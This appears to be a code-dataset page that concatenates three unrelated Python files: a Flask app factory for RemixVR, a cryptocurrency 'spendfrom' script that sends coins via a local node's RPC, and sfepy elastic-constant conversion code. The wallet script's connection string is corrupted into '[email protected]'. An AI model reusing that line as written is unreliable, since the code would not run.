from remixvr.settings import ProdConfig
from remixvr.exceptions import InvalidUsage
def create_app(config_object=ProdConfig):
"""An application factory, as explained here:
http://flask.pocoo.org/docs/patterns/appfactories/.
:param config_object: The configuration object to use.
"""
app = Flask(__name__.split('.')[0])
app.url_map.strict_slashes = False
app.config.from_object(config_object)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
register_shellcontext(app)
register_commands(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
bcrypt.init_app(app)
cache.init_app(app)
db.init_app(app)
migrate.init_app(app, db)
jwt.init_app(app)
def register_blueprints(app):
"""Register Flask blueprints."""
origins = app.config.get('CORS_ORIGIN_WHITELIST', '*')
cors.init_app(user.views.blueprint, origins=origins)
cors.init_app(profile.views.blueprint, origins=origins)
cors.init_app(project.views.blueprint, origins=origins)
cors.init_app(theme.views.blueprint, origins=origins)
cors.init_app(field.views.blueprint, origins=origins)
cors.init_app(space.views.blueprint, origins=origins)
cors.init_app(activity.views.blueprint, origins=origins)
cors.init_app(activitytype.views.blueprint, origins=origins)
cors.init_app(classroom.views.blueprint, origins=origins)
cors.init_app(school.views.blueprint, origins=origins)
cors.init_app(submission.views.blueprint, origins=origins)
app.register_blueprint(user.views.blueprint)
app.register_blueprint(profile.views.blueprint)
app.register_blueprint(project.views.blueprint)
app.register_blueprint(theme.views.blueprint)
app.register_blueprint(field.views.blueprint)
app.register_blueprint(space.views.blueprint)
app.register_blueprint(activity.views.blueprint)
app.register_blueprint(activitytype.views.blueprint)
app.register_blueprint(classroom.views.blueprint)
app.register_blueprint(school.views.blueprint)
app.register_blueprint(submission.views.blueprint)
def register_errorhandlers(app):
def errorhandler(error):
response = error.to_json()
response.status_code = error.status_code
return response
app.errorhandler(InvalidUsage)(errorhandler)
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'db': db,
'User': user.models.User,
'UserProfile': profile.models.UserProfile,
'Project': project.models.Project,
'Theme': theme.models.Theme,
'Field': field.models.Field,
'Position': field.models.Position,
'Text': field.models.Text,
'Number': field.models.Number,
'Audio': field.models.Audio,
'Video': field.models.Video,
'VideoSphere': field.models.VideoSphere,
'Image': field.models.Image,
'PhotoSphere': field.models.PhotoSphere,
'Space': space.models.Space,
'Activity': activity.models.Activity,
'ActivityType': activitytype.models.ActivityType,
'Classroom': classroom.models.Classroom,
'School': school.models.School,
'Submission': submission.models.Submission
}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.test)
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
|
#!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the One Core data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/OneCore/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "OneCore")
return os.path.expanduser("~/.onecore")
def read_bitcoin_config(dbdir):
"""Read the one.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "one.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a One Core JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = "http://%s:%[email protected]:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get ones from")
parser.add_option("--to", dest="to", default=None,
help="address to get send ones to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of one.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(oned) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from sfepy.base.base import *
##
# c: 22.07.2008
def youngpoisson_to_lame( young, poisson, plane = 'strain' ):
r"""
The relationship between Lame parameters and Young's modulus, Poisson's
ratio (see [1],[2]):
.. math::
\lambda = {\nu E \over (1+\nu)(1-2\nu)},\qquad \mu = {E \over 2(1+\nu)}
The plain stress hypothesis:
.. math::
\bar\lambda = {2\lambda\mu \over \lambda + 2\mu}
[1] I.S. Sokolnikoff: Mathematical Theory of Elasticity. New York, 1956.
[2] T.J.R. Hughes: The Finite Element Method, Linear Static and Dynamic
Finite Element Analysis. New Jersey, 1987.
"""
mu = young/(2.0*(1.0 + poisson))
lam = young*poisson/((1.0 + poisson)*(1.0 - 2.0*poisson))
if plane == 'stress':
lam = 2*lam*mu/(lam + 2*mu)
return lam, mu
##
# c: 22.07.2008
def stiffness_tensor_lame( dim, lam, mu ):
r"""
Stiffness tensor - using Lame coefficients
.. math::
{\bm D}_{(2D)} = \begin{bmatrix} \lambda + 2\mu & \lambda & 0\\
\lambda & \lambda + 2\mu & 0\\ 0 & 0 & \mu \end{bmatrix}
.. math::
{\bm D}_{(3D)} = \begin{bmatrix} \lambda + 2\mu & \lambda &
\lambda & 0 & 0 & 0\\ \lambda & \lambda + 2\mu & \lambda & 0 & 0 & 0 \\
\lambda & \lambda & \lambda + 2\mu & 0 & 0 & 0 \\ 0 & 0 & 0 & \mu & 0 &
0 \\ 0 & 0 & 0 & 0 & \mu & 0 \\ 0 & 0 & 0 & 0 & 0 & \mu\\ \end{bmatrix}
"""
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return lam * oot + mu * nm.diag( o + 1.0 )
##
# c: 22.07.2008
def stiffness_tensor_youngpoisson( dim, young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return stiffness_tensor_lame( dim, lam, mu )
##
# c: 10.08.2009
def stiffness_tensor_lame_mixed( dim, lam, mu ):
r"""
Stiffness tensor - using Lame coefficients
.. math::
{\bm D}_{(2D)} = \begin{bmatrix} \widetilde\lambda + 2\mu &
\widetilde\lambda & 0\\ \widetilde\lambda & \widetilde\lambda + 2\mu &
0\\ 0 & 0 & \mu \end{bmatrix}
.. math::
{\bm D}_{(3D)} = \begin{bmatrix} \widetilde\lambda + 2\mu &
\widetilde\lambda & \widetilde\lambda & 0 & 0 & 0\\ \widetilde\lambda &
\widetilde\lambda + 2\mu & \widetilde\lambda & 0 & 0 & 0 \\
\widetilde\lambda & \widetilde\lambda & \widetilde\lambda + 2\mu & 0 &
0 & 0 \\ 0 & 0 & 0 & \mu & 0 & 0 \\ 0 & 0 & 0 & 0 & \mu & 0 \\ 0 & 0 &
0 & 0 & 0 & \mu\\ \end{bmatrix}
where
.. math::
\widetilde\lambda = {2\over 3} (\lambda - \mu)
"""
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return 2.0/3.0*(lam-mu) * oot + mu * nm.diag( o + 1.0 )
##
# c: 10.08.2009
def stiffness_tensor_youngpoisson_mixed( dim, young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return stiffness_tensor_lame_mixed( dim, lam, mu )
##
# c: 10.08.2009
def bulk_modulus_lame( lam, mu ):
r"""
Bulk modulus - using Lame coefficients
.. math::
\gamma = {1\over 3}(\lambda + 2\mu)
"""
return 1.0/3.0 * (2*mu + lam)
##
# c: 10.08.2009
def bulk_modulus_youngpoisson( young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return bulk_modulus_lame( lam, mu )
elastic_constants_relations = {
}
class ElasticConstants(Struct):
r"""
Conversion formulas for various groups of elastic constants. The elastic
constants supported are:
- :math:`E` : Young's modulus
- :math:`\nu` : Poisson's ratio
- :math:`K` : bulk modulus
- :math:`\lambda` : Lamé's first parameter
- :math:`\mu, G` : shear modulus, Lamé's second parameter
- :math:`M` : P-wave modulus, longitudinal wave modulus
The elastic constants are referred to by the following keyword arguments:
young, poisson, bulk, lam, mu, p_wave.
Exactly two of them must be provided to the __init__() method.
Examples
--------
- basic usage::
>>> from sfepy.mechanics.matcoefs import ElasticConstants
>>> ec = ElasticConstants(lam=1.0, mu=1.5)
>>> ec.young
3.6000000000000001
>>> ec.poisson
0.20000000000000001
>>> ec.bulk
2.0
>>> ec.p_wave
4.0
>>> ec.get(['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave'])
[2.0, 1.0, 1.5, 3.6000000000000001, 0.20000000000000001, 4.0]
- reinitialize existing instance::
>>> ec.init(p_wave=4.0, bulk=2.0)
>>> ec.get(['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave'])
[2.0, 1.0, 1.5, 3.6000000000000001, 0.20000000000000001, 4.0]
"""
def __init__(self, young=None, poisson=None, bulk=None, lam=None,
mu=None, p_wave=None, _regenerate_relations=False):
"""
Set exactly two of the elastic constants, and compute the remaining.
"""
self.names = ['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave']
if _regenerate_relations:
self.relations = self._construct_relations()
else:
from elastic_constants import relations
self.relations = relations
## print sorted(self.relations.keys())
## print len(self.relations)
self.init(young=young, poisson=poisson, bulk=bulk, lam=lam,
mu=mu, p_wave=p_wave)
def _construct_relations(self):
"""
Construct the dictionary of all relations among the six elastic
constants and save it as `elastic_constants.py` module, that can be
imported for reuse. Users should not call this!
"""
import sympy as sm
relations = {}
def _expand_keys(sols):
for key, val in sols.iteritems():
if len(val) == 2 and (key.name == 'poisson'):
val = val[0]
else:
val = val[-1]
skey = tuple(sorted([ii.name for ii in val.atoms()
if ii.is_Symbol])) + (key.name,)
if skey in relations:
print '!', skey
relations[skey] = val
bulk, lam, mu, young, poisson, p_wave = sm.symbols(self.names, real=True)
_expand_keys(sm.solve(bulk - (lam + 2 * mu / 3)))
_expand_keys(sm.solve(young - (mu * (3 * lam + 2 * mu) / (lam + mu))))
_expand_keys(sm.solve(poisson - (lam / (2 * (lam + mu)))))
_expand_keys(sm.solve(p_wave - (lam + 2 * mu)))
_expand_keys(sm.solve(bulk - (young / (3 * (1 - 2 * poisson)))))
_expand_keys(sm.solve(p_wave - ((young * (1 - poisson))
/ ((1 + poisson) * (1 - 2 * poisson)))))
# Choose the correct root manually.
## relations[('p_wave', 'young', 'poisson')] \
## = (young - p_wave + (-10*p_wave*young + young**2 +
## 9*p_wave**2)**(0.5))/(4*p_wave)
_expand_keys(sm.solve(lam - (young * poisson
/ ((1 + poisson) * (1 - 2 * poisson)))))
# Choose the correct root.
## relations[('lam', 'young', 'poisson')] \
## = (lam + young - (2*lam*young + young**2 +
## 9*(lam**2))**(0.5))/(-4*lam)
_expand_keys(sm.solve(mu - (young / (2 * (1 + poisson)))))
_expand_keys(sm.solve(bulk - (young * mu / (3 * (3 * mu - young)))))
_expand_keys(sm.solve(p_wave - (mu * (4 * mu - young)
/ (3 * mu - young))))
_expand_keys(sm.solve(young - (9 * bulk * (bulk - lam)
/ (3 * bulk - lam))))
_expand_keys(sm.solve(poisson - (lam / (3 * bulk - lam))))
_expand_keys(sm.solve(p_wave - (3 * bulk - 2 * lam)))
_expand_keys(sm.solve(poisson - ((3 * bulk - 2 * mu)
/ (2 * (3 * bulk + mu)))))
_expand_keys(sm.solve(p_wave - (bulk + 4 * mu / 3)))
_expand_keys(sm.solve(p_wave - (lam * (1 - poisson) / poisson)))
_expand_keys(sm.solve(p_wave - (2 * mu * (1 - poisson)
/ (1 - 2 * poisson))))
_expand_keys(sm.solve(p_wave - (3 * bulk * (1 - poisson)
/ (1 + poisson))))
_expand_keys(sm.solve(p_wave - (3 * bulk * (3 * bulk + young)
/ (9 * bulk - young))))
_expand_keys(sm.solve(young - ((lam*p_wave + p_wave**2 - 2*lam**2)
/ (lam + p_wave))))
fd = open(os.path.join(os.path.dirname(__file__),
'elastic_constants.py'), 'w')
fd.write("""
from __future__ import division
import sympy as sm
names = ['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave']
bulk, lam, mu, young, poisson, p_wave = sm.symbols(names, real=True)
relations = {
%s
}
""" % ',\n'.join([' %s : %s' % (key, val)
for key, val in relations.iteritems()]))
fd.close()
return relations
def init(self, young=None, poisson=None, bulk=None, lam=None,
mu=None, p_wave=None):
"""
Set exactly two of the elastic constants, and compute the
remaining. (Re)-initializes the existing instance of ElasticConstants.
"""
Struct.__init__(self, young=young, poisson=poisson, bulk=bulk, lam=lam,
mu=mu, p_wave=p_wave)
values = {}
for key, val in self.__dict__.iteritems():
if (key in self.names) and (val is not None):
values[key] = val
known = values.keys()
if len(known) != 2:
raise ValueError('exactly two elastic constants must be provided!')
unknown = set(self.names).difference(known)
for name in unknown:
key = tuple(sorted(known)) + (name,)
val = float(self.relations[key].n(subs=values))
setattr(self, name, val)
def get(self, names):
"""
Get the named elastic constants.
"""
out = [getattr(self, name) for name in names]
return out
class TransformToPlane( Struct ):
"""Transformmations of constitutive law coefficients of 3D problems to 2D."""
def __init__( self, iplane = None ):
"""`iplane` ... vector of indices denoting the plane, e.g.: [0, 1]"""
if iplane is None:
iplane = [0, 1]
# Choose the "master" variables and the "slave" ones
# ... for vectors
i_m = nm.sort( iplane )
i_s = nm.setdiff1d( nm.arange( 3 ), i_m )
# ... for second order tensors (symmetric storage)
i_ms = {(0, 1) : [0, 1, 3],
(0, 2) : [0, 2, 4],
(1, 2) : [1, 2, 5]}[tuple( i_m )]
i_ss = nm.setdiff1d( nm.arange( 6 ), i_ms )
Struct.__init__( self, iplane = iplane,
i_m = i_m, i_s = i_s,
i_ms = i_ms, i_ss = i_ss )
def tensor_plane_stress( self, c3 = None, d3 = None, b3 = None ):
"""Transforms all coefficients of the piezoelectric constitutive law
from 3D to plane stress problem in 2D: strain/stress ordering/ 11 22
33 12 13 23. If `d3` is None, uses only the stiffness tensor `c3`.
`c3` ... stiffness tensor
`d3` ... dielectric tensor
`b3` ... piezoelectric coupling tensor"""
mg = nm.meshgrid
cs = c3[mg(self.i_ss,self.i_ss)]
cm = c3[mg(self.i_ss,self.i_ms)].T
if d3 is None: # elasticity only.
A = cs
Feps = cm
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
return c2
else:
dm = d3[mg(self.i_s,self.i_m)].T
ds = d3[mg(self.i_s,self.i_s)]
ii = mg( self.i_s, self.i_ss )
A = nm.r_[nm.c_[cs, b3[ii]],
nm.c_[b3[ii].T, -ds]] #=> sym !!!
F = nm.r_[nm.c_[cm, b3[mg(self.i_m,self.i_ss)]],
nm.c_[b3[mg(self.i_s,self.i_ms)].T, -dm ]]
Feps = F[:,:3]
FE = F[:,3:]
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
d2 = d3[mg(self.i_m,self.i_m)] \
- nm.dot( FE.T, nm.dot( Ainv, FE ) )
b2 = b3[mg(self.i_m,self.i_ms)].T \
- nm.dot( FE.T, nm.dot( Ainv, Feps ) )
return c2, d2, b2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.